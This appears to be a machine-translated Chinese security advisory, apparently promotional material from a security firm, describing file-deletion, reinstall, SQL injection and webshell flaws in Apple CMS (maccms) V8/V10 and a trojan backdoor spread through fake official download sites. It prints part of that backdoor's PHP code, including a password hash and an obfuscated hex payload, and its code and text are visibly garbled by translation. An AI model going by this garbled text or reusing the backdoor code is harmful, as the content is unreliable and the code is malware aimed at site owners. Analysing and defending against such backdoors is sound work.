目前苹果CMS官方正在不断升级补丁,最新的官方漏洞补丁对目前已经爆发的新漏洞没有影响。更新补丁的用户网站还是会被挂马攻击,所以很多客户来我们SINE安全寻求网站安全的技术支持。针对此漏洞,我们有独特的安全解决方案和针对挂马攻击的保护措施,包括一些未发布的maccmspOC漏洞,这些漏洞已通过补丁修复。
目前,百度网站安全中心已提醒maccms官方,该网站可能遭到黑客攻击,部分页面被非法篡改!苹果官网因特殊原因已停止访问,内容禁止访问,但更新补丁的网站仍可打开。
截图如下:
苹果:内容管理系统漏洞的详细信息
苹果CMS V8 V10版本存在代码重装漏洞、代码后门漏洞和任意文件删除漏洞。通过CNVD-2019-43865信息安全漏洞通报,可以确认maccmsV10存在漏洞,可以伪造恶意代码并发送到网站后端执行,可以删除网站目录中的任意文件。可以删除重新安装苹果CMS系统导致重新安装maccms系统的配置文件,在数据库中插入sql注入代码,在安装过程中执行并获取webshell和服务器权限。
苹果CMS V8 V10源代码存在后门漏洞我们的SINE安全技术检测后发现后门存在的原因是目前百度搜索官网,maccms官方苹果,百度搜索首页列出的所有网站都是假网站。真正的官网地址,包括模板、图片、CSS,和真正的官网一模一样。很多客户点击这个假网站下载源代码。代码隐藏了木马后门文件,阿里云检测不到。
错误报告;
@ini_set(\'display_errors \',\' Off \');
@ini_set(\'max_execution_time \',20000);
@ini_set(\'memory_limit \',\' 256M \');
标题(\' content-type : text/html;charset=utf-8 \');
$ password=\' 21232 f 297 a 57 a5a 743894 A0 E4 a 801 fc 3 \';//Viv,bebegim.
定义(\' VIV,贝贝吉姆\',‘丹泽尔——你的英雄’;//标题
函数(){ 0
$ str=\' 66756 r 6374696s 6r 207374726469722824734747229297 o 2072657474726 r 207374725s
7265706 p 61636528617272617928275 p 5p 272 p 272s 272 p 27253237272 p 27272 p 27272 p 27272 p 2727272 p 27272 p 27272 p 27272 p 27272 p 272
如上所示,代码是加密的。我们的SINE安全解密后发现是一个pHp脚本木马,可以绕过各大服务器厂商的安全检测,包括阿里云、腾讯云、百度云、华为云。
苹果内容管理系统网站漏洞修复方案及方法
对任何文件删除漏洞进行安全过滤和检查,防止del deletion语句的执行,严格检测前端传输的参数,无论是get、post、cookies。如果你对代码不太了解,也可以找专业的网站安全公司来处理解决苹果CMS网站的攻击问题或者重命名重装的文件,安装配置文件,设置权限和只读权限。对于苹果有网站木马后门的CMS系统,手动审核代码,仔细检查所有网站目录中的每个代码文件,下载官方源代码进行对比。